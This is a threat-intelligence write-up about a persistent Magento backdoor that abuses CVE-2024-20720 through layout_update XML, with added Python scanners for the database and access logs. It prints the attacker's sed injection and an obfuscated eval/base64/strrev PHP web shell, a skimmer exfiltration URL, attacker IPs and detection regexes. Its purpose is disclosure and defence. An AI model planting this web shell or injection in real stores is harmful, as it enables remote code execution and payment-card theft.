cyware: Persistent Magento backdoor hidden in XML

Summary: This content discusses a recent attack on Magento websites where threat actors injected shell code into the XML code of the layout_update database table, allowing them to execute system commands and create a remote code execution backdoor.

Threat Actor: Unknown
Victim: Magento websites

Key Points:

  • The attack involved injecting shell code into the XML code of the layout_update database table.
  • The shell code allowed the threat actors to execute system commands and create a remote code execution backdoor.
  • The attack exploited the Magento layout parser and the beberlei/assert package to execute the commands.
  • The backdoor could be accessed by POSTing a command to /cms/index.
  • The attack used the CVE-2024-20720 vulnerability, which was discovered in February 2024.
  • The attacker also injected a fake Stripe payment skimmer to steal payment data.
  • Affected merchants are advised to run an eComscan scanner and upgrade their Magento version to protect against the attack.
  • The attacker IPs observed in this attack were 45.146.54.58, 45.146.54.59, 45.146.54.61, 45.146.54.67, 216.73.163.170, and 216.73.163.182.
Oops, your XML now contains shell code

The following XML code was found in the layout_update database table and is responsible for periodic reinfections of your system.

[Image: Magecart payload in XML]

Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands. Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested. In this case, the command is sed, which adds a backdoor to the (automatically generated) CMS controller. Clever, because the malware would be reinjected after a manual fix or a bin/magento setup:di:compile run:

sed -i "s/___init();/___init();n        if  (  isset  (   $_POST  [   "7faa27b473" ])  )   {n            $catalogQuery  ="bas" .   "e64_de".   "code" ;n            @  eval  (  $catalogQuery (  strrev  (  $_POST  ["7faa27b473"] )  ));n            exit (   0  )   ;n        }/g" 
	../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php

And this leads to a remote code execution backdoor, which can be used by POSTing a command to /cms/index:

public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\Controller\Result\ForwardFactory $resultForwardFactory, ?\Magento\Framework\App\Config\ScopeConfig
{
  $this->___init();
  if  (  isset  (   $_POST  [   "7faa27b473" ])  )   {
    $catalogQuery  ="bas" .   "e64_de".   "code" ;
    @  eval  (  $catalogQuery (  strrev  (  $_POST  ["7faa27b473"] )  ));
    exit (   0  )   ;
  }
  parent::__construct($context, $resultForwardFactory, $scopeConfig, $page);
}
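
The two places this infection lives, the layout_update table and the generated Interceptor class, can both be checked with simple indicator matching. The following Python scanner is an added example written for this page; it is not Sansec's eComscan and not Magento code. It assumes a row export of layout_update as (layout_update_id, handle, xml) tuples and a path to <magento>/generated/code; the indicator labels, the regexes and all sample data are constructed here, with the backdoor sample built from the lines quoted above.

```python
import re
from pathlib import Path

# Indicators taken from the incident above: a layout_update row should never carry
# shell syntax or refer to generated code, and a generated Interceptor class should
# never read request data or call eval(). Labels are mine; the regexes tolerate the
# whitespace padding seen in the injected code.
LAYOUT_SUSPECTS = [
    ("sed -i edit of files", re.compile(r"\bsed\s+-i\b")),
    ("reference to generated Interceptor", re.compile(r"Interceptor\.php")),
    ("beberlei Assert class reference", re.compile(r"\bAssert\\Assert\b")),
    ("PHP shell function", re.compile(r"\b(shell_exec|system|passthru|exec|popen)\s*\(")),
]
INTERCEPTOR_SUSPECTS = [
    ("reads request superglobal", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("eval() call", re.compile(r"\beval\s*\(")),
    ("strrev() call", re.compile(r"\bstrrev\s*\(")),
    ("base64_decode (plain or split string)",
     re.compile(r"base64_decode|[\"']bas[\"']\s*\.\s*[\"']e64", re.IGNORECASE)),
]


def _match(patterns, text):
    return [label for label, rx in patterns if rx.search(text)]


def scan_layout_xml(xml: str) -> list[str]:
    """Return the indicator labels found in one layout_update.xml value."""
    return _match(LAYOUT_SUSPECTS, xml)


def scan_interceptor_source(src: str) -> list[str]:
    """Return the indicator labels found in one generated Interceptor.php."""
    return _match(INTERCEPTOR_SUSPECTS, src)


def scan_layout_update_rows(rows):
    """rows: (layout_update_id, handle, xml) tuples, e.g. fetched with
    SELECT layout_update_id, handle, xml FROM layout_update.
    Returns only the rows that matched, with their indicator labels."""
    flagged = []
    for row_id, handle, xml in rows:
        hits = scan_layout_xml(xml)
        if hits:
            flagged.append((row_id, handle, hits))
    return flagged


def scan_generated_dir(root) -> list:
    """Walk <magento>/generated/code and scan every Interceptor.php found."""
    flagged = []
    for path in Path(root).rglob("Interceptor.php"):
        hits = scan_interceptor_source(path.read_text(errors="replace"))
        if hits:
            flagged.append((str(path), hits))
    return flagged


# Constructed sample data (not taken from a real store).
BENIGN_LAYOUT_XML = r"""<referenceContainer name="content">
  <block class="Magento\Cms\Block\Block" name="promo.banner">
    <arguments><argument name="block_id" xsi:type="string">promo-banner</argument></arguments>
  </block>
</referenceContainer>"""

SUSPECT_LAYOUT_XML = r"""<referenceContainer name="content">
  <block class="Magento\Framework\View\Element\Template" name="constructed.suspect">
    <arguments>
      <argument name="x" xsi:type="string">sed -i "s/PLACEHOLDER/PLACEHOLDER/g" ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php</argument>
    </arguments>
  </block>
</referenceContainer>"""

# Simplified stand-in for the real generated class (constructor signature shortened).
CLEAN_INTERCEPTOR = r"""<?php
namespace Magento\Cms\Controller\Index\Index;
class Interceptor extends \Magento\Cms\Controller\Index\Index
{
    public function __construct(\Magento\Framework\App\Action\Context $context, $resultForwardFactory, $scopeConfig, $page)
    {
        $this->___init();
        parent::__construct($context, $resultForwardFactory, $scopeConfig, $page);
    }
}
"""

# Same class with the backdoor lines quoted in the article spliced in after ___init().
BACKDOORED_INTERCEPTOR = CLEAN_INTERCEPTOR.replace(
    "$this->___init();",
    '$this->___init();\n        if  (  isset  (   $_POST  [   "7faa27b473" ])  )   {\n'
    '            $catalogQuery  ="bas" .   "e64_de".   "code" ;\n'
    '            @  eval  (  $catalogQuery (  strrev  (  $_POST  ["7faa27b473"] )  ));\n'
    '            exit (   0  )   ;\n        }',
)

if __name__ == "__main__":
    rows = [(1, "default", BENIGN_LAYOUT_XML), (2, "checkout_cart_index", SUSPECT_LAYOUT_XML)]
    print("layout_update:", scan_layout_update_rows(rows))
    print("clean interceptor:", scan_interceptor_source(CLEAN_INTERCEPTOR))
    print("backdoored interceptor:", scan_interceptor_source(BACKDOORED_INTERCEPTOR))
```

Because generated/code is rebuilt from source by setup:di:compile, a simpler baseline check is also available: any Interceptor.php that differs from a fresh compile, or that reads a superglobal at all, is worth a look. Cleaning the file without removing the layout_update row only buys time until the next /checkout/cart request reinjects it.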

This is the first time that we see actual abuse of CVE-2024-20720, which was discovered just this February by security researcher blaklis.

The attacker used this mechanism to inject a fake Stripe payment skimmer, which would copy payment data to https://halfpriceboxesusa.com/pub/health_check.php (apparently another compromised Magento store).

Next steps for affected merchants

If you are affected, make sure to run our eComscan scanner to uncover any hidden backdoors on your system, see below for a 1-click scan command.

Next, make sure to upgrade your Magento to 2.4.6-p4, 2.4.5-p6 or 2.4.4-p7. See our version matrix for a useful overview.

Attribution

We observed the following attacker IPs:

45.146.54.58
45.146.54.59
45.146.54.61
45.146.54.67
216.73.163.170
216.73.163.182
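
The attacker IPs above and the POST-to-/cms/index trigger described earlier are both visible in ordinary web server access logs. The following Python script is an added example, not part of the Sansec or Cyware write-up: it parses combined-format log lines, flags requests from the listed IPs and flags any POST to the CMS index controller. The assumption that a storefront never legitimately receives POSTs at /cms/index (or its /cms/index/index alias, with an optional store-code prefix) is mine, as are the regexes and the constructed sample lines, which use documentation addresses and a placeholder date.

```python
import re

# IPs listed in the article's attribution section.
ATTACKER_IPS = {
    "45.146.54.58", "45.146.54.59", "45.146.54.61", "45.146.54.67",
    "216.73.163.170", "216.73.163.182",
}

# Combined (Apache/nginx style) access log line; group names are mine.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# The backdoor hangs off the generated CMS index controller, i.e. /cms/index and its
# /cms/index/index alias. An optional leading segment allows a store-code prefix
# such as /en/. Assumption: the storefront never receives POSTs at this URL.
CMS_INDEX_RE = re.compile(r"(?:/[\w-]+)?/cms/index(?:/index)?/?")


def parse_line(line: str):
    """Return a dict for a parsable log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def classify(rec) -> list[str]:
    """Return the reasons a parsed request is suspicious (empty if none)."""
    reasons = []
    if rec["ip"] in ATTACKER_IPS:
        reasons.append("known attacker IP")
    if rec["method"] == "POST" and CMS_INDEX_RE.fullmatch(rec["path"]):
        reasons.append("POST to CMS index controller")
    return reasons


def analyze(lines):
    """Run both rules over an iterable of log lines and collect alerts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            alerts.append((rec["ip"], rec["method"], rec["path"], reasons))
    return alerts


# Constructed sample log (documentation IPs for normal visitors, placeholder date).
SAMPLE_LOG = [
    '45.146.54.58 - - [01/Jan/2024:00:00:01 +0000] "POST /cms/index HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:00:00:02 +0000] "GET /checkout/cart/ HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:00:00:03 +0000] "GET /cms/index/index/ HTTP/1.1" 200 6011 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Jan/2024:00:00:04 +0000] "POST /en/cms/index/index/?x=1 HTTP/1.1" 200 0 "-" "curl/8.4.0"',
    '216.73.163.182 - - [01/Jan/2024:00:00:05 +0000] "GET /checkout/cart HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The third sample line shows why the method matters: GET /cms/index/index/ is simply the homepage and must not alert, while the same path with POST has no legitimate use on a stock storefront. Run the script over rotated logs as well, since the reinfection trigger (a request to /checkout/cart) leaves no trace on its own.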

Source: https://sansec.io/research/magento-xml-backdoor
